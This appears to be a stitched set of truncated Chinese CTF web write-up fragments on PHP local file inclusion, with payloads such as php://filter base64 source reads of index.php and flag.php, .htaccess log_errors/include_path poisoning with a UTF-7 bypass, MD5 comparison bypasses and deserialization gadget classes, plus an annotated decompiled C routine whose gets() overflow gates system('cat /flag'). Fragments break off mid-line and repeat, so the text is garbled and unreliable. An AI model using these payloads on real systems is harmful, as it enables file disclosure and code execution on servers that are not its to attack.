<?php include $_GET['file']; ?> 先用LFI读取index.php再说。 /?file=php://filter/read=convert.base64-encode/resource=index.php 得到源码: <?php error_reporting(0); $file = $_GET["file"]; if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"ph...
include_path:选择文件包含的默认路径 将log_errors=1,error_log=/tmp/f13g.php,include_path='<?php phpinfo();' index.php会根据include_path包含./f13g.php,没有该文件,报错,将错误日志与<?php phpinfo();写入/tmp/f13g.php 然后这里<>会被html实体编码转义,需要用utf-7绕过:1. php_value log_erro...
//flag in `flag.php` include($_GET['file']); }else{ echo "Baby Hacker?"; } }else{ echo "No Hacker!"; } Hint: 1219893521 首先爆破伪随机数:https://www.openwall.com/php_mt_seed/ root@mochu7-pc:/mnt/d...
include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $p...
/*
 * Decompiler output for the number-guessing routine, restored to one
 * statement per line (the listing had lost every line break, so the
 * trailing `//` annotations swallowed the code that followed them).
 *
 * Prints a prompt, reads a line from stdin with gets(), then compares the
 * local float against 11.28125. On a match it runs `cat /flag` through
 * system(); otherwise it prints the expected value. Returns whatever
 * system() or puts() returned.
 *
 * Security note: gets() takes no length limit. By the frame offsets the
 * decompiler printed, the input buffer starts at rsp+0h and the float sits
 * at rsp+2Ch, so a line longer than that gap is written past the buffer and
 * into the variable that gates system(). The function never assigns the
 * float from input, so the comparison can only succeed through that memory
 * corruption. A bounded read (fgets() with the real buffer size) keeps
 * input inside the buffer; gets() itself was removed from the language in
 * C11.
 */
int func()
{
  int status;   // eax
  char line;    // [rsp+0h] [rbp-30h] -- typed as a single char by the decompiler; presumably a larger buffer, confirm against the binary
  float guess;  // [rsp+2Ch] [rbp-4h]

  guess = 0.0;
  puts("Let's guess the number.");
  gets(&line);  // unbounded read into the stack buffer
  if ( guess != 11.28125 )
  {
    status = puts("Its value should be 11.28125");
    return status;
  }
  status = system("cat /flag");
  return status;
}
include($file); }else{ echo'tips'; } ?> 好像没有拦截flag关键字,直接用LFI读取flag.php即可。 1 /?file=php://filter/read=convert.base64-encode/resource=flag.php 成功读取后解码 [极客大挑战 2019]Knife 打开题目,得到提示: knife 1 eval($...
<?php include "flag.php"; echo "flag在哪里呢?"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match(...
#class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = '...
2021.10.3 [MRCTF2020]Ez_bypass I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { ...
include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $source; public $str; public function __construct($file='index.php'){ $this->source = $file; echo 'Welcome to '.$this->source.""; } public function __toString(){ return $this-...